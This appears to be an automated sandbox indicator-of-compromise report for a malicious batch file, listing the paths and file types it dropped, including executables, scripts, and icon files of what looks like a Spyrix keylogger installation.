IOC Report
c5WMpr1cOc.bat

loading gif

Files

File Path
Type
Category
Malicious
c5WMpr1cOc.bat
ASCII text, with CRLF line terminators
initial sample
malicious
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe (copy)
PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
dropped
malicious
C:\ProgramData\Spyrix Free Keylogger\temp\reg\info.uid
Windows Registry little-endian text (Win2K or above)
dropped
malicious
C:\Users\user\AppData\Local\Temp\eb90c874-90f1-477e-bf8d-92cb4599bdb5\[space]= .exe
PE32 executable (GUI) Intel 80386, for MS Windows
modified
malicious
C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\ProgramData\Microsoft\Network\Downloader\edb.log
data
dropped
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
Extensible storage engine DataBase, version 0x620, checksum 0x6c0fd194, page size 16384, DirtyShutdown, Windows version 10.0
dropped
C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
data
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\WebBrowser.dll (copy)
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\cfg.cmd (copy)
ASCII text, with CRLF line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\dashboard.cmd (copy)
ASCII text, with CRLF line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\dashboard.url (copy)
MS Windows 95 Internet shortcut text (URL=<"https://dashboard.spyrix.com">), ASCII text, with CRLF line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\Discord.ico (copy)
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\Discord.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\Facebook Messenger.ico (copy)
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\Facebook Messenger.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\Line.ico (copy)
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\Line.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\Mail Agent.ico (copy)
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\Mail Agent.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\Messenger.ico (copy)
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\Messenger.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\Microsoft Teams.ico (copy)
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\Microsoft Teams.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\Mozilla Thunderbird.ico (copy)
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\Mozilla Thunderbird.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\Opera Mail.ico (copy)
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\Opera Mail.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\Telegram.ico (copy)
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\Telegram.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\Tencent QQ.ico (copy)
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\Tencent QQ.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\Viber.ico (copy)
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\Viber.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\WhatsApp.ico (copy)
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\WhatsApp.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\Zoom.ico (copy)
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\Zoom.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\aim.ico (copy)
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\aim.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\google talk.ico (copy)
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\google talk.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\icq.ico (copy)
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\icq.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-0792H.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-2Q0P0.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-3VJA0.tmp
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-4E6MA.tmp
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-4UKF4.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-54RJK.tmp
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-66N62.tmp
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-7PKRJ.tmp
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-8TP7V.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-9G9CC.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-9QS94.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-A3UU9.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-C9L4A.tmp
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-CE435.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-CKQ4V.tmp
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-D8KLK.tmp
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-ESC9P.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-F07T0.tmp
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-F8DRF.tmp
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-F9LNN.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-FKG2G.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-GQ638.tmp
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-GS1MF.tmp
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-HBAE2.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-HLNSP.tmp
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-HO3LF.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-IICD2.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-JQ1MF.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-JUD98.tmp
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-KS758.tmp
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-L8G0P.tmp
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-M4A4H.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-M71GK.tmp
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-N8RGH.tmp
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-NCBB7.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-NNA59.tmp
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-NSHLH.tmp
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-OHQNG.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-OO1JS.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-P1FFP.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-PF9N1.tmp
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-PLO9O.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-PU4P5.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-Q50E1.tmp
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-R0STO.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-T5SOE.tmp
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\none.ico (copy)
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\none.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\qip.ico (copy)
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\qip.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\skype.ico (copy)
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\skype.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\slack.ico (copy)
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\slack.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\trillian.ico (copy)
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\trillian.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\windows live messenger.ico (copy)
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\windows live messenger.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\yahoo! messenger.ico (copy)
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\yahoo! messenger.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\Discord.ico (copy)
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\Facebook Messenger.ico (copy)
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\Google Talk.ico (copy)
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\Line.ico (copy)
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\Mail Agent.ico (copy)
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\Messenger.ico (copy)
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\Microsoft Teams.ico (copy)
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\Mozilla Thunderbird.ico (copy)
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\Opera Mail.ico (copy)
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\Telegram.ico (copy)
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\Tencent QQ.ico (copy)
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\Viber.ico (copy)
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\WhatsApp.ico (copy)
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\Windows Live Messenger.ico (copy)
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\Yahoo! Messenger.ico (copy)
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\Zoom.ico (copy)
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\aim.ico (copy)
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\icq.ico (copy)
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\is-2GLLF.tmp
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\is-5280P.tmp
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\is-6CGGI.tmp
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\is-736MC.tmp
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\is-A0CJS.tmp
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\is-C4O2C.tmp
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\is-C7Q4R.tmp
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\is-DCR92.tmp
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\is-FBQMF.tmp
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\is-FTLS9.tmp
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\is-INTC6.tmp
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\is-K1B48.tmp
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\is-KGHQE.tmp
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\is-N4L5B.tmp
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\is-NC0JK.tmp
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\is-OSOH0.tmp
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\is-P3TCG.tmp
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\is-QLCN5.tmp
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\is-RVCPB.tmp
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\is-T7NEH.tmp
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\is-TEGFK.tmp
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\is-TLVGL.tmp
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\is-UIPIG.tmp
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\is-UJ94G.tmp
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\mail.ico (copy)
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\none.ico (copy)
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\qip.ico (copy)
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\skype.ico (copy)
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\slack.ico (copy)
